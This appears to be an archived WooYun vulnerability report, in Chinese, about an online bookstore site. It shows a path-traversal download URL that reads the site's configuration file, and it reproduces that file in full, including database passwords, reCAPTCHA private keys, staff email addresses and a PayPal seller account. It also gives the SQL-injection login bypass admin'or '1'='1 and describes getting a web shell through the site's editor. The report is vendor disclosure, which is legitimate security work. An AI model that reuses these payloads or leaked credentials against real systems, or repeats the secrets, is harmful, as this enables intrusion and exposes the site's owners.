乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-13: 细节已通知厂商并且等待厂商处理中 2016-01-14: 厂商已经确认,细节仅向厂商公开 2016-01-24: 细节向核心白帽子及相关领域专家公开 2016-02-03: 细节向普通白帽子公开 2016-02-13: 细节向实习白帽子公开 2016-02-27: 细节向公众公开
rt
目标:http://**.**.**.**1.任意文件下载构造,
http://**.**.**.**/force_download.php?file=../../force_download.php
配置文件
http://**.**.**.**/force_download.php?file=../../_common/site_config.php
site_config.php中
if(UAT){ define('DEBUG_MODE', false); //define('ADMIN_MAIL', "admin@**.**.**.**"); //define('ORDER_MAIL', "orders.sagebooks@**.**.**.**"); define('ADMIN_MAIL', "tim.20130401@**.**.**.**"); define('ORDER_MAIL', "tim.20130401@**.**.**.**"); define('MAIL_FROM', "admin@**.**.**.**"); define('MAIL_FROM_NAME', "Sage Sagebooks"); define("SMTP", "localhost"); define("SMTP_ID", ""); define("SMTP_PWD", ""); //Google Captcha http://**.**.**.** define('RECAPTCHA_KEY_PUBLIC', "6LcmdO0SAAAAABGlcjqrEDe58RJaGOJ6RJVbdFis"); define('RECAPTCHA_KEY_PRIVATE', "6LcmdO0SAAAAAEL9BvR8q_asz7OpIe-NeIK3VYfH"); //database define('DB_USER', 'sagefoun_sage'); define('DB_PWD', 'children2013'); define('DB_HOST', 'localhost'); define('DB_NAME', 'sagefoun_sage'); //directory define('SERVER_URL', "http://**.**.**.**"); define('SITE_ROOT', '/'); //paypal define('PAYPAL_SITE', "**.**.**.**"); define('PAYPAL_URL', "https://**.**.**.**/cgi-bin/webscr"); define('PAYPAL_SELLER', "seller_1296180842_biz@**.**.**.**"); }//LIVE ============================================================================== elseif(LIVE){ define('DEBUG_MODE', false); error_reporting(0); ini_set('display_errors', 0); //define('ORDER_TEST', true); define('ORDER_TEST', false); if(!ORDER_TEST){ define('ADMIN_MAIL', "orders.sagebooks@**.**.**.**"); define('ORDER_MAIL', "orders.sagebooks@**.**.**.**"); }else{ define('ADMIN_MAIL', "garlichsuen@**.**.**.**"); define('ORDER_MAIL', "garlichsuen@**.**.**.**"); } define('MAIL_FROM', "admin@**.**.**.**"); define('MAIL_FROM_NAME', "思展 Sagebooks"); define("SMTP", "localhost"); define("SMTP_ID", ""); define("SMTP_PWD", ""); //Google Captcha sage define('RECAPTCHA_KEY_PUBLIC', "6LcmdO0SAAAAABGlcjqrEDe58RJaGOJ6RJVbdFis"); define('RECAPTCHA_KEY_PRIVATE', "6LcmdO0SAAAAAEL9BvR8q_asz7OpIe-NeIK3VYfH"); //database //define('DB_USER', 'sagefoun_cms'); //define('DB_PWD', 'children1997'); //define('DB_HOST', 'localhost'); //define('DB_NAME', 'sagefoun_cms'); define('DB_USER', 'sagefoun_sage'); define('DB_PWD', 'children2013'); define('DB_HOST', 'localhost'); define('DB_NAME', 'sagefoun_sage');
2.注入后台
http://**.**.**.**/_sage_admin/index.php
构造
admin'or '1'='1
进入后台
利用编辑器和解析漏洞,拿下shell
..
危害等级:高
漏洞Rank:16
确认时间:2016-01-14 17:09
已將事件通知有關機構
暂无